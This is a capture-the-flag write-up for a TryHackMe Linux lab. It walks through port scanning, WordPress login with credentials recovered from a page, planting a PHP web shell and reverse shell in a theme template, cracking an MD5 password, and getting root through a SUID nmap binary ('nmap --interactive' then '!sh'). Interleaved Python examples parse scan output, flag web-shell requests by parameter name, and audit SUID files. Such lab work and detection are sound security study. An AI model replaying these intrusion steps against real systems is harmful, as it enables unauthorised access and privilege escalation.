#tryhackme #linux #medium

![[Pasted image 20250706144446.png]]

---

# Information Gathering - Nmap

I began by scanning all 65,535 TCP ports and found 3 open ports.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ sudo nmap -sS $IP -Pn -n --open --min-rate 3000 -p-
[sudo] password for parallels:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-06 12:25 CDT
Nmap scan report for 10.10.49.18
Host is up (0.13s latency).
Not shown: 65532 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https

Nmap done: 1 IP address (1 host up) scanned in 43.94 seconds
```

Then I ran a script and version scan (`-sC -sV`) against those open ports.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sC -sV $IP -p 22,80,443
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-06 12:27 CDT
Nmap scan report for 10.10.49.18
Host is up (0.13s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 99:97:25:77:c6:12:be:fa:f9:64:1b:4c:d9:53:b7:f4 (RSA)
|   256 1b:c1:70:cf:29:16:8f:2e:a1:92:2c:45:99:49:da:0e (ECDSA)
|_  256 1f:12:7e:03:e1:b9:54:fe:4b:1a:21:b0:d8:ae:6e:d7 (ED25519)
80/tcp  open  http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.91 seconds
```

A UDP scan of the top 1,000 ports revealed no open ports.
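The version scan above is worth reading as data, not just as a screen dump: the certificate on 443/tcp carries a placeholder `commonName` that does not match the host, and its expiry is only a couple of months past the scan date. As an added example (not part of the original writeup), here is a small Python parser for Nmap's normal output format, with a check that flags exactly that kind of certificate finding. The sample text is a constructed excerpt in the same format as the scan output on this page; the expected common name and the 90-day warning window are assumptions.

```python
"""Parse Nmap normal output into records and flag TLS certificate oddities.

Added example, not part of the original writeup. SAMPLE_NMAP_OUTPUT is a
constructed excerpt in the same layout as the -sC -sV output shown above.
"""
import re
from datetime import datetime, timedelta

SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.10.49.18
Host is up (0.13s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http     Apache httpd
|_http-server-header: Apache
443/tcp open  ssl/http Apache httpd
|_http-server-header: Apache
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03
"""

# "22/tcp  open  ssh      OpenSSH 8.2p1 ..." -> port, proto, state, service, version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
CN_RE = re.compile(r"commonName=([^,\s]+)")
NOT_AFTER_RE = re.compile(r"Not valid after:\s+(\S+)")


def parse_nmap(text):
    """Return one dict per port line; NSE script lines ("|", "|_") that follow a
    port are attached to that port, and ssl-cert fields are pulled out."""
    ports = []
    current = None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = {
                "port": int(m.group(1)), "proto": m.group(2),
                "state": m.group(3), "service": m.group(4),
                "version": (m.group(5) or "").strip(), "cert": {},
            }
            ports.append(current)
            continue
        if current is None or not line.startswith("|"):
            continue  # header/summary lines, not script output
        cn = CN_RE.search(line)
        if cn:
            current["cert"]["cn"] = cn.group(1)
        na = NOT_AFTER_RE.search(line)
        if na:
            current["cert"]["not_after"] = datetime.fromisoformat(na.group(1))
    return ports


def cert_findings(ports, scan_time, expected_cn, warn_days=90):
    """Flag certs whose CN is not the expected host name, are already expired
    at scan time, or expire within warn_days of it. scan_time may be an ISO
    string or a datetime."""
    if isinstance(scan_time, str):
        scan_time = datetime.fromisoformat(scan_time)
    findings = []
    for p in ports:
        cert = p["cert"]
        if not cert:
            continue
        if cert.get("cn") != expected_cn:
            findings.append((p["port"], "cn-mismatch", cert.get("cn")))
        not_after = cert.get("not_after")
        if not_after is not None:
            if not_after < scan_time:
                findings.append((p["port"], "expired", not_after.isoformat()))
            elif not_after - scan_time < timedelta(days=warn_days):
                findings.append((p["port"], "expiring-soon", not_after.isoformat()))
    return findings


if __name__ == "__main__":
    parsed = parse_nmap(SAMPLE_NMAP_OUTPUT)
    for p in parsed:
        print(p["port"], p["proto"], p["state"], p["service"], p["version"])
    # Scan timestamp and expected CN are assumptions taken from the scan above.
    for finding in cert_findings(parsed, "2025-07-06T12:27:00", "10.10.49.18"):
        print("cert finding:", *finding)
```

The parser only understands the normal-output layout; for anything beyond a quick triage, `-oX` and Nmap's XML output are the stable interface.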
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sU $IP --min-rate 3000 --top-ports 1000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-06 12:32 CDT
Nmap scan report for 10.10.49.18
Host is up (0.14s latency).
Not shown: 997 open|filtered udp ports (no-response)
PORT    STATE  SERVICE
22/udp  closed ssh
80/udp  closed http
443/udp closed https

Nmap done: 1 IP address (1 host up) scanned in 1.49 seconds
```

---

# Footprinting

##### Port 80 & 443

Both 80 and 443 appear to serve the same website, shown below.

![[Pasted image 20250706123713.png]]

A `Gobuster` scan revealed several directories that we could explore to find leads for exploitation.

![[Pasted image 20250706125244.png]]

Most of the directories found by `Gobuster` were either empty or simply displayed a "Forbidden" message. Below are the directories that had at least something interesting.

`/image`

![[Pasted image 20250706124828.png]]

`/readme`

![[Pasted image 20250706124606.png]]

`/robots` listed two entries that we can check out.

![[Pasted image 20250706124529.png]]

`/fsocity.dic` appears to be a wordlist, and based on the scroll bar, it looks to be quite extensive.

![[Pasted image 20250706130140.png]]

The `/key-1-of-3.txt` file appears to contain part of a hash. I couldn't identify the hash type, likely because it's incomplete. Based on the file name, it seems there are two more parts we need to find in order to crack it -- but that's just my assumption.

![[Pasted image 20250706130353.png]]

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ wget http://$IP/fsocity.dic -O robots_wordlist
--2025-07-06 13:13:52--  http://10.10.49.18/fsocity.dic
Connecting to 10.10.49.18:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7245381 (6.9M) [text/x-c]
Saving to: ‘robots_wordlist’

robots_wordlist     100%[====================================================>]   6.91M  1.79MB/s    in 4.7s

2025-07-06 13:13:57 (1.46 MB/s) - ‘robots_wordlist’ saved [7245381/7245381]
```

On the `/license` page, I used the inspector and found what appears to be a base64-encoded string. I almost missed it because I usually just view the page source and move on -- and this encoded string didn't appear there.

![[Pasted image 20250706132427.png]]

I base64-decoded what I found and got the plaintext string.

![[Pasted image 20250706133913.png]]

# Export

It turns out the plaintext I extracted from the encoded string was a full set of credentials -- both a username and a password -- not just a password, because I was able to log into the WordPress dashboard with it.

![[Pasted image 20250706134519.png]]

`elliot` is actually an administrator, meaning we can probably create, modify, or delete files.

![[Pasted image 20250706135709.png]]

Under the `Appearance` tab, I selected `Editor` and chose the `404 Template` to modify.

![[Pasted image 20250706140241.png]]

Before getting a reverse shell, I tested sending commands and checked for communication with a simple PHP one-liner.

![[Pasted image 20250706140712.png]]

Upon navigating to `/wp-includes/themes/twentyfifteen/404.php?cmd=id`, I was able to see the output of the `id` command. Now it's time to get a reverse shell!

![[Pasted image 20250706141050.png]]

Here's the payload I used, a very common reverse shell payload.

![[Pasted image 20250706141242.png]]

Got a reverse shell as `daemon`!

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.23.133.183] from (UNKNOWN) [10.10.49.18] 50926
/bin/sh: 0: can't access tty; job control turned off
$ whoami
daemon
```

# Lateral Movement & Privilege Escalation

In `/home/robot`, there are two files: `key-2-of-3.txt` and `password.raw-md5`.
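Both steps of the foothold above leave a clear trail in the web server's access log: a POST to the dashboard's theme editor when the 404 template is saved, followed by direct requests to a theme PHP file with a command-style query parameter. As an added example (not part of the original writeup), here is a small Python detector that runs those two rules over Apache combined-format log lines. The log lines are constructed (addresses from the RFC 5737 documentation ranges), and the parameter names treated as command-style are an assumption.

```python
"""Flag dashboard theme edits and direct calls to theme PHP files in Apache logs.

Added example, not part of the original writeup. CONSTRUCTED_LOG is made up for
this demonstration; nothing in it comes from the target in the writeup.
"""
import re
from urllib.parse import parse_qs, urlsplit

CONSTRUCTED_LOG = """\
198.51.100.9 - - [06/Jul/2025:14:01:03 -0500] "GET /wp-content/themes/twentyfifteen/style.css HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.5 - - [06/Jul/2025:14:02:41 -0500] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 0 "http://blog.example/wp-admin/theme-editor.php" "Mozilla/5.0"
203.0.113.5 - - [06/Jul/2025:14:07:12 -0500] "GET /wp-content/themes/twentyfifteen/404.php?cmd=id HTTP/1.1" 200 312 "-" "Mozilla/5.0"
198.51.100.9 - - [06/Jul/2025:14:09:55 -0500] "GET /?p=42 HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
"""

# Apache "combined" format: client ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Theme PHP files are normally never requested directly; WordPress routes through index.php.
THEME_PHP_RE = re.compile(r"^/(?:wp-content|wp-includes)/themes/[^/]+/.*\.php$")
# Assumed set of parameter names that typically carry a command to a dropped web shell.
SHELL_PARAMS = {"cmd", "c", "exec", "command", "shell"}


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["params"] = parse_qs(parts.query)
    rec["status"] = int(rec["status"])
    return rec


def classify(rec):
    """Return a rule name if the request matches a theme-abuse pattern, else None."""
    if rec["method"] == "POST" and rec["path"] == "/wp-admin/theme-editor.php":
        return "theme-editor-write"          # a theme file was saved from the dashboard
    if THEME_PHP_RE.match(rec["path"]):
        if SHELL_PARAMS & set(rec["params"]):
            return "theme-php-shell-param"    # direct call with a command-style parameter
        return "theme-php-direct"             # direct fetch of theme PHP, unusual on its own
    return None


def scan_log(text):
    """Run classify() over every line; return (client, rule, path) for each hit."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        rule = classify(rec)
        if rule:
            findings.append((rec["ip"], rule, rec["path"]))
    return findings


if __name__ == "__main__":
    for finding in scan_log(CONSTRUCTED_LOG):
        print(*finding)
```

The editor write is the higher-value alert because it precedes the shell: an administrator account that saves theme files from the dashboard is either an admin doing maintenance or, as here, an attacker who already holds admin credentials. Setting `define('DISALLOW_FILE_EDIT', true);` in `wp-config.php` removes the built-in editor entirely, which would have closed this particular path from dashboard access to code execution.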
The key file is owned by `robot` and only user `robot` can read it. On the other hand, anyone can read the password file.

```bash
daemon@ip-10-10-49-18:/home/robot$ ls -l
total 8
-r-------- 1 robot robot 33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13  2015 password.raw-md5
```

It simply contains user `robot`'s credentials, with the password stored as an MD5 hash.

```bash
daemon@ip-10-10-49-18:/home/robot$ cat password.raw-md5
robot:c3...
```

Because a raw MD5 password hash is easily cracked, I looked it up on `crackstation.net`.

![[Pasted image 20250706141751.png]]

With the cracked password, I switched to `robot`, which means I can now read the key file.

```bash
daemon@ip-10-10-49-18:/home/robot$ su robot
Password:
$ whoami
robot
```

Got the second key.

```bash
robot@ip-10-10-49-18:~$ cat key-2-of-3.txt
822c...
```

##### robot > root

While looking around the system, I noticed that the `/usr/local/bin/nmap` binary has the SUID bit set, which is unusual.

```bash
robot@ip-10-10-49-18:/tmp$ find / -type f -perm -4000 2>/dev/null
/bin/umount
/bin/mount
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/pkexec
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
```

We can do either of the following. I'm just going to follow the `Shell` method because it's slightly easier.

![[Pasted image 20250706143854.png]]

![[Pasted image 20250706144249.png]]

Got a shell as `root` :)

```bash
robot@ip-10-10-49-18:/tmp$ nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
root@ip-10-10-49-18:/tmp# whoami
root
```

Also got the last part of the key.

```bash
root@ip-10-10-49-18:/root# cat key-3-of-3.txt
047...
```
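The `find` listing above is the whole story of the root step: sixteen of those SUID files are what the distribution and its guest tools install, and one (`/usr/local/bin/nmap`) is not. As an added example (not part of the original writeup), here is a Python audit that compares a SUID listing against an allowlist and also flags any SUID file living outside package-managed directories, so a stray binary under `/usr/local`, `/opt`, `/tmp` or a home directory stands out even if the allowlist is incomplete. The sample input is the listing from this page; the baseline set and the list of package-managed prefixes are assumptions to be replaced with values taken from a known-good image.

```python
"""Audit set-uid files against an allowlist and against where they live.

Added example, not part of the original writeup. SAMPLE_FIND_OUTPUT reuses the
`find / -perm -4000` listing shown above; BASELINE and PACKAGED_PREFIXES are
assumptions for this demonstration, not a vetted reference list.
"""
import os
import stat

SAMPLE_FIND_OUTPUT = """\
/bin/umount
/bin/mount
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/pkexec
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
"""

# Assumed allowlist: the SUID files the base image is expected to ship with.
BASELINE = {
    "/bin/umount", "/bin/mount", "/bin/su",
    "/usr/bin/passwd", "/usr/bin/newgrp", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/sudo", "/usr/bin/pkexec",
    "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/policykit-1/polkit-agent-helper-1",
    "/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper",
    "/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
}

# Assumed: directories the package manager owns. A SUID file anywhere else was
# put there by hand (or by an attacker) and deserves a look regardless of name.
PACKAGED_PREFIXES = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/",
                     "/usr/lib/", "/usr/libexec/")


def parse_find_output(text):
    """Turn `find` output (one path per line) into a list of paths."""
    return [line.strip() for line in text.splitlines() if line.strip()]


def audit_suid(paths, baseline=BASELINE):
    """Return {path: [reasons]} for every SUID file that needs attention."""
    flagged = {}
    for path in paths:
        reasons = []
        if path not in baseline:
            reasons.append("not-in-baseline")
        if not path.startswith(PACKAGED_PREFIXES):
            reasons.append("non-packaged-location")
        if reasons:
            flagged[path] = reasons
    return flagged


def find_suid(root="/", skip=("/proc", "/sys", "/dev", "/run")):
    """Live equivalent of `find / -type f -perm -4000`: walk the tree and
    return regular files whose mode carries the set-uid bit."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda err: None):
        if dirpath.startswith(skip):
            dirnames[:] = []  # do not descend into pseudo-filesystems
            continue
        for name in filenames:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)  # lstat: never follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(full)
    return sorted(found)


if __name__ == "__main__":
    # Offline run over the listing from the writeup; swap in find_suid() on a live host.
    for path, reasons in audit_suid(parse_find_output(SAMPLE_FIND_OUTPUT)).items():
        print(path, ", ".join(reasons))
```

Run periodically (or as a file-integrity rule), this catches the misconfiguration before anyone needs to look for it. The fix on the target is to drop the bit (`chmod u-s /usr/local/bin/nmap`) or remove the binary; the interactive mode being abused here exists only in very old Nmap releases and is gone from current ones, so an ancient SUID copy under `/usr/local` has no legitimate reason to exist.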